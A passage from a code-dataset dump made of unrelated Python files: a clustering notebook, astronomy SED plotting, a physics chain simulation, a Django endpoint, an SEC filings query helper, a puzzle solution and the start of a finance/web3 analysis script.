time.sleep(.3)\n print(\"Deleted!\")\n\n currentDate = datetime.date.today()\n day = currentDate.day\n month = currentDate.month\n year = currentDate.year\n\n formattedDate = \"%s-%s-%s\" % (month,day,year)\n \n\n backupFileName = str(\"floatDataExported-Backup-\"+formattedDate+\".ssg\")\n\n\n self.exportFloatData(str(backupFileName))\n \n \n \n with open(\"floatData.txt\",\"w\") as floatData:\n floatData.write(\"\")\n floatData.close()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n self.createInfoMessage(\"Data Deleted and Backup Created!\",\"All exsiting data has been deleted. A backup of the data was saved to file '\"+str(backupFileName)+\"' before it was deleted.\")\n\n\n \n\n#callable class called to call another class. hows that for an alitteration?\ndef runClass(name):\n #must calll as a static method\n MainWindow.close\n className = eval(name)()\n className.setupUi(MainWindow)\n MainWindow.show\n\napp = QtWidgets.QApplication(sys.argv)\nMainWindow = QtWidgets.QMainWindow()\n \ndef run():\n\n while Running:\n continue\n\n\n","sub_path":"sinkingFileClass.py","file_name":"sinkingFileClass.py","file_ext":"py","file_size_in_byte":43864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"411425540","text":"\n# coding: utf-8\n\n# ## Introduction to kmeans cluster \n# \n# This notebook applies the sklearn.cluster function to the synthetic data of hist2d_intro.ipynb\n\n# In[1]:\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport matplotlib\nimport os,site\nimport numpy.random as nr\nimport warnings\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\n\n# ### define two bullseyes using fake data from a 2-d gaussian distribution\n# \n# Use a 2-dimensional gaussian distribution to define two bullseye clusters with\n# different means and standard deviations\n\n# In[2]:\n\ndef makeRandom(meanx=None,stdx=None,meany=None,stdy=None,rho=None,\n numpoints=100000):\n\n \"\"\"\n return a tuple with two vectors (xvec,yvec) giving the\n coordinates of numpoints chosen from a two dimensional\n Gauassian distribution\n\n Parameters\n ----------\n\n meanx: float -- mean in x direction\n stdx: float -- standard deviation in x direction\n meany: float -- mean in y direction\n stdy: float -- standar deviation in y direction\n numpoints: length of returned xvec and yvec\n\n\n Returns\n -------\n\n (xvec, yvec): tuple of ndarray vectors of length numpoints\n\n Example\n -------\n\n invalues={'meanx':450.,\n 'stdx':50,\n 'meany':-180,\n 'stdy':40,\n 'rho':0.8}\n\n chanx,chany=makeRandom(**invalues)\n\n\n \"\"\"\n \n nr.seed(50)\n sigma=np.array([stdx**2., rho*stdx*stdy, rho*stdx*stdy, stdy**2.])\n sigma.shape=[2,2]\n meanvec=[meanx,meany]\n outRandom=nr.multivariate_normal(meanvec,sigma,[numpoints,])\n chan1=outRandom[:,0]\n chan2=outRandom[:,1]\n return (chan1,chan2)\n\n\n# In[3]:\n\n#\n# first bullseye centered at (x=450,y= -180)\n#\ninvalues={'meanx':450.,\n 'stdx':50,\n 'meany':-180,\n 'stdy':40,\n 'rho':0.8}\n\n\nchanx,chany=makeRandom(**invalues)\n\n#\n# second bullseye centered at (x=50,y=-80)\n#\nbullseye={'meanx':50.,\n 'stdx':14,\n 'meany':-80,\n 'stdy':14,\n 'rho':0.0}\n\nchanxB,chanyB=makeRandom(**bullseye)\nchanx=np.concatenate((chanx,chanxB))\nchany=np.concatenate((chany,chanyB))\n\n\n# ### Show the bullseyes on a scatterplot\n\n# In[4]:\n\nget_ipython().magic('matplotlib inline')\nplt.close('all')\nfig1,axis2=plt.subplots(1,1,figsize=(10,10))\nfig1.clf()\naxis2=fig1.add_subplot(111)\naxis2.plot(chanx,chany,'b.')\naxis2.set_title('scatterplot')\nfig1.savefig('scatter.png')\naxis2.set(xlabel=\"channel x\",ylabel='channel y');\n\n\n# ### reformat the data into an array of shape [samples,channels]\n\n# In[5]:\n\nX=np.vstack([chanx,chany])\nX=X.T\nX.shape\n\n\n# ### find two cluster centers\n\n# In[6]:\n\nkmeans = KMeans(n_clusters=2)\nkmeans.fit(X)\nkmeans.cluster_centers_\n\n\n# ### put the cluster centers on the scatterplot\n# \n# use the zorder keyword to get the red dots on top of the blue dots\n\n# In[7]:\n\nfig,ax=plt.subplots(1,1,figsize=(10,10))\nax.plot(chanx,chany,'b.',alpha=0.005,zorder=1)\ncenters=kmeans.cluster_centers_\nax.scatter(centers[:,0],centers[:,1],c='red',s=180,alpha=1,zorder=2);\n\n\n# ### put the cluster centers on the 2-d histogram\n\n# In[8]:\n\nx_num=70\ny_num=50\nx_bins=np.linspace(0,700,x_num)\ny_bins=np.linspace(-400,0,y_num)\nH,y_edges,x_edges=np.histogram2d(chany,chanx,bins=(y_bins,x_bins))\ny_centers=(y_edges[1:] + y_edges[:-1])/2.\nx_centers=(x_edges[1:] + x_edges[:-1])/2.\n\n\n# In[9]:\n\ncmap=matplotlib.cm.magma #see http://wiki.scipy.org/Cookbook/Matplotlib/Show_colormaps\ncmap.set_over('r')\ncmap.set_under('w')\ncmap.set_bad('0.75') #75% grey\nvmin= 0\nvmax= 4\nthe_norm=matplotlib.colors.Normalize(vmin=vmin,vmax=vmax,clip=False)\nfig,ax=plt.subplots(1,1,figsize=(10,10))\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n cs=ax.pcolormesh(x_centers,y_centers,np.log10(H),norm=the_norm,cmap=cmap)\n ax.scatter(centers[:,0],centers[:,1],c='red',s=180,alpha=1)\nax.set(xlabel=\"channel x\",ylabel='channel y');\ncax=fig.colorbar(cs, shrink=0.5, pad=0.05,extend='both')\nout=cax.ax.set_ylabel('log10(counts)')\nout.set_rotation(270)\nout.set_verticalalignment('bottom'); \n\n\n# In[ ]:\n\n\n\n","sub_path":"notebooks/python/cluster_intro.py","file_name":"cluster_intro.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"624921314","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author:owefsad\n# software: PyCharm\n# project: lingzhi-webapi\n\nfrom dongtai.endpoint import R\nfrom dongtai.utils import const\nfrom dongtai.endpoint import UserEndPoint\nfrom dongtai.models.agent import IastAgent\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass ProjectEngines(UserEndPoint):\n name = \"api-v1-project-engines\"\n description = _(\"View engine list\")\n\n def get(self, request, pid):\n auth_users = self.get_auth_users(request.user)\n queryset = IastAgent.objects.filter(user__in=auth_users, online=const.RUNNING, bind_project_id__in=[0, pid]).values(\n \"id\", \"token\")\n data = []\n if queryset:\n for item in queryset:\n data.append({\n 'id': item['id'],\n 'token': item['token'],\n 'short_name': '-'.join(item['token'].split('-')[:-1]),\n })\n return R.success(data=data)\n","sub_path":"iast/views/project_engines.py","file_name":"project_engines.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"213867680","text":"\n# coding: utf-8\n\n# # import\n\n# In[1]:\n\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\n\n\n\n# # Read data\n\n# In[2]:\n\nregion_name = ['ELAIS_N1','OPH','CHA_II','LUP_I','LUP_III','LUP_IV','PER','SER']\ncalg_name = ['star','gala','ysos']\nband_name = ['J', 'H', 'K', 'IRAC_1', 'IRAC_2', 'IRAC_3', 'IRAC_4', 'MIPS_1']\nqual_name = ['A', 'B', 'C', 'D', 'E', 'F', 'K', 'N', 'U']\nwavelength = [1.235, 1.662, 2.159, 3.550, 4.493, 5.731, 7.872, 23.68]\n\n\n# In[3]:\n\nwith open('../data/data_all_observation', 'rb') as data_all:\n data = pickle.load(data_all)\nwith open('../data/qual_all_observation', 'rb') as qual_all:\n qual = pickle.load(qual_all)\n\n\n# In[4]:\n\nfor region in region_name:\n for calg in calg_name:\n if region=='ELAIS_N1' and calg == 'ysos':\n continue\n else:\n############################################################\n for i in range(len(qual[region][calg])):\n for j in [0,1,2,7]:\n if qual[region][calg][i][j] == 'U':\n data[region][calg][i][j] = 0.0000001\n\n\n# In[5]:\n\ndata_number = {}\nfor region in region_name:\n data_number.setdefault(region,{})\n for calg in calg_name:\n if region=='ELAIS_N1' and calg == 'ysos':\n continue\n else: \n data_number[region].setdefault(calg,[])\n data_number[region][calg] = len(data[region][calg])\ndata_number\n\n\n# In[6]:\n\nstar = np.vstack(data[region]['star'] for region in region_name)\ngala = np.vstack(data[region]['gala'] for region in region_name)\nysos = np.vstack(data[region]['ysos'] for region in region_name[1:])\nprint(len(star), len(gala), len(ysos))\n\n\n# # 1. Typical SED\n\n# In[7]:\n\nfrom matplotlib import rc\nrc('text', usetex=True)\nrc('font', family='serif')\nimport matplotlib.ticker as ticker\n\n\n# In[8]:\n\n\"\"\"\nsample = {}\nsample['star'] = np.random.choice(len(star),15,replace = False)\nsample['gala'] = np.random.choice(len(gala),15,replace = False)\nsample['ysos'] = np.random.choice(len(ysos),15,replace = False)\nwith open('sample', 'wb') as f:\n pickle.dump(sample,f)\n\"\"\"\n\n\n# In[9]:\n\nplt.figure(figsize=(16,8))\n\nwith open('sample', 'rb') as f:\n sample = pickle.load(f)\n#=======star===========\nplt.subplot(2,3,1)\nfor i in sample['star']:\n star_sed = star[i]/np.max(star[i][:8])\n plt.plot(wavelength, star_sed[:8])\nplt.subplot(2,3,4)\nfor i in sample['star']:\n star_sed = star[i]/np.max(star[i][:8])\n plt.plot(wavelength, star_sed[8:])\n#=======gala===========\nplt.subplot(2,3,2)\nfor i in sample['gala']:\n gala_sed = gala[i]/np.max(gala[i][:8])\n plt.plot(wavelength, gala_sed[:8])\nplt.subplot(2,3,5)\nfor i in sample['gala']:\n gala_sed = gala[i]/np.max(gala[i][:8])\n plt.plot(wavelength, gala_sed[8:])\n#=======ysos===========\nplt.subplot(2,3,3)\nfor i in sample['ysos']:\n ysos_sed = ysos[i]/np.max(ysos[i][:8])\n plt.plot(wavelength, ysos_sed[:8])\nplt.subplot(2,3,6)\nfor i in sample['ysos']:\n ysos_sed = ysos[i]/np.max(ysos[i][:8])\n plt.plot(wavelength, ysos_sed[8:])\n\n################################################################ \n \ntitle = ['(a) SED of stars', '(b) SED of galaxies','(c) SED of YSOs',\n '(d) Error of stars', '(e) Error of galaxies', '(f) Error of YSOs']\n\nfor i in range(6):\n\n# set ticks\n plt.subplot(2,3,i+1)\n plt.tick_params(labelsize=20)\n plt.xscale('log', basex = 2)\n plt.xlim(1.15,25)\n if i in [0,1,2]:\n plt.xticks(np.array([]))\n plt.ylim(0,1.2)\n else:\n plt.xticks(np.array([2,5,10,20]))\n plt.ylim(0,0.6)\n \n if i == 0:\n plt.yticks([0.0,0.2,0.4,0.6,0.8,1.0,1.2])\n elif i in [1,2]:\n plt.yticks([0.0,0.2,0.4,0.6,0.8,1.0,1.2])\n plt.gca().yaxis.set_major_formatter(plt.NullFormatter())\n elif i ==3:\n plt.yticks([0.0,0.1,0.2,0.3,0.4,0.5])\n else:\n plt.yticks([0.0,0.1,0.2,0.3,0.4,0.5])\n plt.gca().yaxis.set_major_formatter(plt.NullFormatter())\n \n plt.gca().xaxis.set_major_formatter(ticker.ScalarFormatter())\n plt.gca().xaxis.set_ticks_position('both')\n plt.gca().xaxis.set_tick_params(direction='inout', length = 6)\n plt.gca().yaxis.set_ticks_position('both')\n plt.gca().yaxis.set_tick_params(direction='inout', length = 6)\n\n# set axis label\n if i in [3,4,5]:\n plt.xlabel(r'\\textup{Wavelength ($\\mu$m)}', fontsize = 22)\n if i == 0: \n plt.ylabel(r'\\textup{Normalized Flux}', fontsize = 22)\n if i == 3: \n plt.ylabel(r'\\textup{Normalized Error}', fontsize = 22)\n\n# set linewidth\n plt.subplot(2,3,i+1).spines['left'].set_linewidth(1.3)\n plt.subplot(2,3,i+1).spines['right'].set_linewidth(1.3)\n plt.subplot(2,3,i+1).spines['top'].set_linewidth(1.3)\n plt.subplot(2,3,i+1).spines['bottom'].set_linewidth(1.3)\n\n# set title\n if i in [0,1,2]:\n plt.text(1.2, 1.1, title[i],fontsize=18, ha = 'left', va = 'center')\n else:\n plt.text(1.2, 0.55, title[i],fontsize=18, ha = 'left', va = 'center')\n\n\nplt.subplots_adjust(wspace = 0, hspace = 0)\n#plt.savefig('../figure/SED_error.png', dpi = 600)\n\n\n# # 2 Flux-Error\n\n# In[10]:\n\nplt.figure(figsize=(16,8))\n\nfor i in range(8):\n# plot flux - error\n plt.subplot(2,4,i+1)\n plt.scatter(np.transpose(star)[i], np.transpose(star)[i+8], color = [0,0,1], label ='Star', s= 1)\n plt.scatter(np.transpose(gala)[i], np.transpose(gala)[i+8], color = [0,1,0], label ='Galaxy', s= 1)\n plt.scatter(np.transpose(ysos)[i], np.transpose(ysos)[i+8], color = [1,0,0], label ='YSO', s= 1)\n\n# set ticks\n plt.xscale('log')\n plt.yscale('log')\n plt.xlim(1e-3, 100000)\n plt.ylim(1e-3, 100000)\n plt.xticks(np.array([1e-1,1e1,1e3,1e5]),fontsize = 15)\n plt.yticks(np.array([1e-1,1e1,1e3,1e5]),fontsize = 15)\n plt.tick_params(labelsize=18)\n\n# set linewidth\n plt.subplot(2,4,i+1).spines['left'].set_linewidth(1.2)\n plt.subplot(2,4,i+1).spines['right'].set_linewidth(1.2)\n plt.subplot(2,4,i+1).spines['top'].set_linewidth(1.2)\n plt.subplot(2,4,i+1).spines['bottom'].set_linewidth(1.2)\n\n# set axis label\n plt.gca().xaxis.set_tick_params(direction='inout', length = 6)\n plt.gca().xaxis.set_ticks_position('both')\n plt.gca().yaxis.set_tick_params(direction='inout', length = 6)\n plt.gca().yaxis.set_ticks_position('both')\n # x-axis \n if i in [0,1,2,3]:\n plt.gca().xaxis.set_major_formatter(plt.NullFormatter()) \n else:\n plt.xlabel(r'\\textup{Flux (mJy)}', fontsize = 22)\n # y-axis \n if i in [1,2,3,5,6,7]:\n plt.gca().yaxis.set_major_formatter(plt.NullFormatter())\n else:\n plt.ylabel(r'\\textup{Error (mJy)}', fontsize = 22)\n # legend and grid\n if i ==0: \n plt.legend(loc = 'upper right',prop={'size': 15}) \n plt.grid()\n\n# set title\n band = ['(a) UKIRT J', '(b) UKIRT H', '(c) UKIRT K','(d) IRAC 1', '(e) IRAC 2', '(f) IRAC 3', '(g) IRAC 4', '(h) MIPS 1']\n plt.text(0.002, 25000, band[i],fontsize=18, ha = 'left', va = 'center')\n\nplt.subplots_adjust(wspace = 0, hspace = 0)\n#plt.savefig('../figure/error-flux.png', dpi = 600)\n\n\n# # 3. 3D plot\n\n# In[ ]:\n\nfrom mpl_toolkits.mplot3d import Axes3D \n\n\n# In[ ]:\n\nplt.figure(figsize = (8,8))\nax = plt.subplot(111, projection='3d') \n\n#plot\nax.scatter(np.log10(np.transpose(star)[5]), np.log10(np.transpose(star)[6]), np.log10(np.transpose(star)[7]), c=[0,0,1], label = 'star', s= 3)\nax.scatter(np.log10(np.transpose(gala)[5]), np.log10(np.transpose(gala)[6]), np.log10(np.transpose(gala)[7]), c=[0,1,0], label = 'galaxy', s= 3)\nax.scatter(np.log10(np.transpose(ysos)[5]), np.log10(np.transpose(ysos)[6]), np.log10(np.transpose(ysos)[7]), c=[1,0,0], label = 'yso', s= 3)\n\n#set axis\nax.set_zlabel(r'\\bf{MIPS 1 (mJy)}', fontsize = 13) # 坐标轴\nax.set_ylabel(r'\\bf{IRAC 4 (mJy)}', fontsize = 13)\nax.set_xlabel(r'\\bf{IRAC 3 (mJy)}', fontsize = 13)\n\nax.set_xlim(-2,4)\nax.set_ylim(-2,4)\nax.set_zlim(-2,4)\n\n#set log scale\n#ticks = [1e-2, 1e-1, 1e0,1e1, 1e2, 1e3]\nticks = [0.01,0.1,1, 10,100,1000]\nax.set_xticks(np.log10(ticks))\nax.set_xticklabels(ticks, fontsize = 13)\n\nax.set_yticks(np.log10(ticks))\nax.set_yticklabels(ticks, fontsize = 13)\n\nax.set_zticks(np.log10(ticks))\nax.set_zticklabels(ticks, fontsize = 13)\n\nax.legend(prop={'size': 15})\nplt.savefig('../figure/3D_plot.png', dpi = 600)\n\n\n# In[ ]:\n\ns = wavelength[:8]\nplt.figure(figsize=(12,8))\nplt.subplot(2,2,1)\nplt.errorbar(s, np.mean((star.T/np.max(star, axis = 1)).T, axis = 0)[:8],\n np.std((star.T/np.max(star, axis = 1)).T, axis = 0)[:8],label = 'star', capsize = 5)\nplt.errorbar(s, np.mean((gala.T/np.max(gala, axis = 1)).T, axis = 0)[:8], \n np.std((gala.T/np.max(gala, axis = 1)).T,axis = 0)[:8],label = 'gala', capsize = 5)\nplt.errorbar(s, np.mean((ysos.T/np.max(ysos, axis = 1)).T, axis = 0)[:8],\n np.std((ysos.T/np.max(ysos, axis = 1)).T, axis = 0)[:8],label = 'ysos', capsize = 5)\nplt.xscale('log')\n#plt.yscale('log')\n#plt.ylim(-200,500)\nplt.xlabel('wavelengeth')\nplt.ylabel('SED')\nplt.legend()\n\nplt.subplot(2,2,2)\nplt.errorbar(s, np.mean((star.T/np.max(star, axis = 1)).T, axis = 0)[:8],\n np.std((star.T/np.max(star, axis = 1)).T, axis = 0)[:8],label = 'star', capsize = 5)\nplt.xscale('log')\n#plt.ylim(-5,20)\nplt.xlabel('wavelengeth')\nplt.ylabel('SED')\nplt.legend()\n\nplt.subplot(2,2,3)\nplt.errorbar(s, np.mean((gala.T/np.max(gala, axis = 1)).T, axis = 0)[:8],\n np.std((gala.T/np.max(gala, axis = 1)).T, axis = 0)[:8],label = 'gala', capsize = 5, c = 'orange')\nplt.xscale('log')\n#plt.ylim(-3,5)\nplt.xlabel('wavelengeth')\nplt.ylabel('SED')\nplt.legend()\n\nplt.subplot(2,2,4)\nplt.errorbar(s, np.mean((ysos.T/np.max(ysos, axis = 1)).T, axis = 0)[:8],\n np.std((ysos.T/np.max(ysos, axis = 1)).T, axis = 0)[:8],label = 'ysos', capsize = 5, c = 'g')\nplt.xscale('log')\n#plt.ylim(100,300)\nplt.xlabel('wavelengeth')\nplt.ylabel('SED')\nplt.legend()\n\n\n# ## colar-colar diagrams\n\n# In[ ]:\n\ndef abs_mag(SED):\n return -2.5*np.log(SED)/np.log(10)\n\n\n# In[ ]:\n\nplt.scatter(abs_mag(star.T[5])-abs_mag(star.T[6]), abs_mag(star.T[6])-abs_mag(star.T[7]), label = 'star', s = 1)\nplt.scatter(abs_mag(gala.T[5])-abs_mag(gala.T[6]), abs_mag(gala.T[6])-abs_mag(gala.T[7]), label = 'gala', s = 1)\nplt.scatter(abs_mag(ysos.T[5])-abs_mag(ysos.T[6]), abs_mag(ysos.T[6])-abs_mag(ysos.T[7]), label = 'ysos', s = 1)\nplt.xlabel('IR3 - IR4')\nplt.ylabel('IR4 - MP1')\nplt.legend()\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\nplt.scatter(abs_mag(star.T[5])-abs_mag(star.T[6]), abs_mag(star.T[5])-abs_mag(star.T[7]), label = 'star', s = 3)\nplt.scatter(abs_mag(gala.T[5])-abs_mag(gala.T[6]), abs_mag(gala.T[5])-abs_mag(gala.T[7]), label = 'gala', s = 3)\nplt.scatter(abs_mag(ysos.T[5])-abs_mag(ysos.T[6]), abs_mag(ysos.T[5])-abs_mag(ysos.T[7]), label = 'ysos', s = 3)\nplt.xlabel('IR3 - IR4')\nplt.ylabel('IR3 - MP1')\nplt.legend()\n\n\n# In[ ]:\n\nplt.scatter(abs_mag(star.T[5])-abs_mag(star.T[6]), abs_mag(star.T[7]), label = 'star', s = 3)\nplt.scatter(abs_mag(gala.T[5])-abs_mag(gala.T[6]), abs_mag(gala.T[7]), label = 'gala', s = 3)\nplt.scatter(abs_mag(ysos.T[5])-abs_mag(ysos.T[6]), abs_mag(ysos.T[7]), label = 'ysos', s = 3)\nplt.xlabel('IR3 - IR4')\nplt.ylabel('MP1')\nplt.legend()\n\n\n# In[ ]:\n\nplt.scatter(abs_mag(star.T[5])-abs_mag(star.T[7]), abs_mag(star.T[5]), label = 'star', s = 3)\nplt.scatter(abs_mag(gala.T[5])-abs_mag(gala.T[7]), abs_mag(gala.T[5]), label = 'gala', s = 3)\nplt.scatter(abs_mag(ysos.T[5])-abs_mag(ysos.T[7]), abs_mag(ysos.T[5]), label = 'ysos', s = 3)\nplt.xlabel('IR3 - MP1')\nplt.ylabel('IR4')\nplt.legend()\n\n\n# In[ ]:\n\n\n\n","sub_path":"plot_pictures/plot_figure.py","file_name":"plot_figure.py","file_ext":"py","file_size_in_byte":11478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"422452332","text":"import time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom simulation import *\n\nstart = time.time()\n\n# simulation parameters\nN = 100\nL = 1.0\nalpha = 0.5\ndt = 0.05\ngamma = 0.05\nn = 100000\n\n# thermal expansion coefficient simulation parameters\naverage_start = int(0.5*n)\nT_min = 0.005\nT_max = 0.05\npoints = 10\nrepeats = 10\n\nTs = np.linspace(T_min, T_max, points)\n\n# run simulations\nl_aves = np.zeros(points)\nfor i,T in enumerate(Ts):\n l_ave = 0.0\n print('Temperature {}: {:.3f}'.format(i+1,T))\n for j in range(repeats):\n sim = Simulation()\n sim.init_integrator('baoab', dt)\n sim.init_thermostat(gamma, T)\n sim.init_chain(N, L, alpha, 'gaussian', 0.1)\n sim.init_output(l=True)\n sim.run(n)\n\n # compute average length\n l = sim.l_hist[average_start:]\n l_ave += np.mean(l)\n\n l_aves[i] = l_ave / repeats\n\n# compute gradient\n\n# normalise with respect to chain length\nspacing_aves = l_aves / (L*(N-1))\nfit = np.polyfit(Ts, spacing_aves, 1)\ngradient = fit[0]\noffset = fit[1]\n\n# compute fit for plot\nfit_data = offset + gradient*Ts\n\nprint('Alpha:', alpha)\nprint('Thermal expansion coefficient:', gradient)\n\nend = time.time()\nprint(\"Elapsed Time:\", end-start)\n\n# plot results\nplt.xlabel('Temperature')\nplt.ylabel('Average Spacings')\nplt.scatter(Ts, spacing_aves, label='Data')\nplt.plot(Ts, fit_data, label='Fit')\nplt.legend()\nplt.show()\n","sub_path":"question_4.py","file_name":"question_4.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"369783473","text":"\n\nfrom xai.brain.wordbase.adjectives._bleak import _BLEAK\n\n#calss header\nclass _BLEAKER(_BLEAK, ):\n\tdef __init__(self,): \n\t\t_BLEAK.__init__(self)\n\t\tself.name = \"BLEAKER\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"bleak\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_bleaker.py","file_name":"_bleaker.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"602434072","text":"__author__ = 'Harry'\n\nimport MyUtil, pandas\n\ndef getSecdbUrlByAccessNum(accession_num):\n acc_num_int = int(accession_num.replace('-',''))\n prefix= acc_num_int % 2999\n url = \"http://edgar.secdatabase.com/{}/{}/\".format(prefix, acc_num_int)\n return(url)\n\n\ndef getDocumentStr(accession_num):\n import MyUtil\n prefix_url =getSecdbUrlByAccessNum(accession_num)\n filelist_url = prefix_url+\"filelist.txt\"\n filelist_str= MyUtil.requestContent(filelist_url)\n\n firsthtml= filelist_str.split('\\r')[0].split('\\t')[2]\n firsthtml_url = prefix_url+firsthtml\n print(firsthtml_url)\n html_str= MyUtil.requestContent(firsthtml_url)\n return(html_str)\n\n\ndef getAccessionNum(ticker):\n print('the getAccessionNum returns a hardcoded list for now...')\n return ['0001326428-11-000012', '0000049600-11-000013', '0001437749-11-002604']\n\n\n#read Doc list for a givenr ticker\\\ndef loadDocList4Secdb(ticker):\n sql =\"\"\"\n select --Symbol, h.AccessionNumber,DocumentName,h.Description,s.ActionDate,s.FilingDate,\n 'http://edgar.secdatabase.com/'+ CONVERT(VARCHAR, CONVERT(BIGINT, REPLACE(h.AccessionNumber, '-',''))%2999)+'/'+CONVERT(VARCHAR,CONVERT(BIGINT, REPLACE(h.AccessionNumber, '-','')))+'/'+DocumentName AS URL\n from EDGAR.dbo.SecurityIdentifierMapping m\n cross apply (\n select l.SubmissionId from HeaderSubmissionCompanyLink l\n inner join HeaderCompany c on l.CompanyId = c.CompanyId\n where c.cik = m.CIK) f\n inner join HeaderSubmission s\n on f.SubmissionId = s.SubmissionId\n inner join EDGAR..HeaderDocument h on s.AccessionNumber = h.AccessionNumber\n WHERE m.Symbol ='{}'\n and s.FilingDate between '20160101' and '20170628'\n and h.Type IN ('10-Q')\n \"\"\".format(ticker)\n\n conn= MyUtil.getConnection('sec')\n res= pandas.read_sql(sql, conn)['URL'].values\n conn.close()\n return(res)\n\n\nif __name__==\"__main__\":\n a = loadDocList4Secdb(\"IBM\")\n print(a)\n","sub_path":"SecdbAPI.py","file_name":"SecdbAPI.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"28733471","text":"import sys\nimport math\n\nop_bowls = input().split()\nmy_bowls = input().split()\nnum = int(input())\n\nind, mine, n = num, True, int(my_bowls[num])\nmy_bowls[ind] = '0'\n\nwhile n > 0:\n ind += 1\n if mine and ind == 7:\n mine = False\n ind = 0\n elif not mine and ind == 6:\n mine = True\n ind = 0\n if mine:\n my_bowls[ind] = str(int(my_bowls[ind])+1)\n else:\n op_bowls[ind] = str(int(op_bowls[ind])+1)\n n -= 1\n\nif mine and ind == 6:\n replay = True\nelse:\n replay = False\n\nans = \"\".join(op_bowls[i] + \" \" for i in range(6))\nans += \"[\" + op_bowls[6] + \"]\\n\"\nans += \"\".join(my_bowls[i] + \" \" for i in range(6))\nans += \"[\" + my_bowls[6] + \"]\"\nprint(ans)\nif replay: print(\"REPLAY\")","sub_path":"practice/puzzles/easy/Simple_Awale.py","file_name":"Simple_Awale.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"213207176","text":"from abis_and_keys import *\nfrom constants import *\nfrom lstm_predictor import prediction_plot\nimport pandas as pd\n#import os\nimport yfinance as yf\nimport numpy as np\nimport requests\nimport json\nfrom datetime import datetime\nfrom threading import Timer\nimport ipywidgets as widgets\nfrom IPython.display import display\nimport hvplot.pandas\nimport web3\nfrom web3 import Web3\nfrom web3.middleware import geth_poa_middleware\nfrom web3.gas_strategies.time_based import medium_gas_price_strategy\nfrom web3.auto.gethdev import w3\nfrom eth_account import Account\nfrom bit.network import NetworkAPI\nfrom dotenv import load_dotenv\nfrom pathlib import Path\nimport arch as arch\n\n#Reading In First DF\nfile_path = Path('PrivateEquityReturnsFinal.csv')\npe_df = pd.read_csv(file_path, parse_dates=True, index_col='Date', infer_datetime_format=True)\npe_df.drop(columns='Unnamed: 8', inplace=True)\npe_df.dropna(inplace=True)\n\n#Final PE DF\ndf = pd.DataFrame(pe_df['Private Equity Returns'])\n\n#Reading In The Second DF\nfile_path_2 = Path('SPXReturns.csv')\neq_df = pd.read_csv(file_path_2, parse_dates=True, index_col='Date', infer_datetime_format=True)\neq_df.dropna(inplace=True)\n\n#Returns DF\nreturns_df = pd.concat([df, eq_df], axis=1, join='inner')\n\n#Calculating the Funds STD\nrolling_std = returns_df.rolling(window=4).std()\n\n#Plotting Fund Returns STD \nrolling_std_plot = rolling_std['Private Equity Returns'].hvplot(title=\"Fund Standard Deviation\")\n\n#Plotting Market STD \nmarket_std_plot = rolling_std['SPX_Return'].hvplot(title=\"S&P 500 Standard Deviation\")\n\nfund_and_market_std = rolling_std.hvplot(y=['Private Equity Returns', 'SPX_Return'], title='Fund vs. SPX Standard Deviation')\n\n#Calculating Covariance \nrolling_covariance = returns_df['Private Equity Returns'].rolling(window=4).cov(returns_df['SPX_Return'])\n\n#Calculate Rolling Variance \nrolling_variance_spx = returns_df['SPX_Return'].rolling(window=4).var()\n\n#Calculate the rolling 1 year beta of the Fund\nrolling_beta = rolling_covariance / rolling_variance_spx\nrolling_beta_plot = rolling_beta.hvplot(title=\"Fund Beta\")\n\n#Calculate Sharpe Ratios for entire group\nsharpe_ratios = (returns_df.mean()*4)/(returns_df.std()*np.sqrt(4))\nsharpe_ratios.sort_values(inplace=True)\n\n# Visualize the sharpe ratios as a bar plot\nsr_plot = sharpe_ratios.hvplot.bar(title=\"Sharpe Ratios\")\n\nsr_cum_plot = pe_df['Cumulative'].hvplot(title=\"Fund's Cumulative Return\")\n\n\n\n# 1 of the following networks must be selected\n# For local network\n#w3 = Web3(Web3.HTTPProvider(\"http://127.0.0.1:8545\"))\n\n# For Kovan live testnet\nw3 = Web3(Web3.HTTPProvider(f\"https://kovan.infura.io/v3/{INFURA_PROJECT_ID}\"))\n\n\n# Ignore\ndef calculate_sharpe(ticker, time_frame):\n \n stock = yf.Ticker(ticker)\n df = stock.history(period=time_frame)['Close'].to_frame()\n \n df['Daily Returns'] = df['Close'].diff()\n df.dropna(inplace=True)\n \n risk_free = 0.0067\n avg_return = df['Daily Returns'].mean()\n vol = df['Daily Returns'].std()\n sharpe = (avg_return - risk_free) / vol * np.sqrt(252)\n \n return sharpe\n\nweights = [0.40, 0.25, 0.15, 0.10, 0.05, 0.05]\n\nconservative_stocks = ['NEM', 'DG', 'REGN', 'DXCM', 'AAPL']\nmoderate_stocks = ['DXCM', 'NVDA', 'ODFL', 'DG', 'REGN', 'AAPL']\naggressive_stocks = ['NVDA', 'DXCM', 'AAPL', 'SWKS', 'ODFL']\n\n# Ignore\ndef cum_return(stock_list, weight_list, time_frame):\n \n df = pd.DataFrame()\n \n for stock in stock_list:\n ticker = yf.Ticker(stock)\n df[f'{stock} Close'] = ticker.history(period=time_frame)['Close']\n 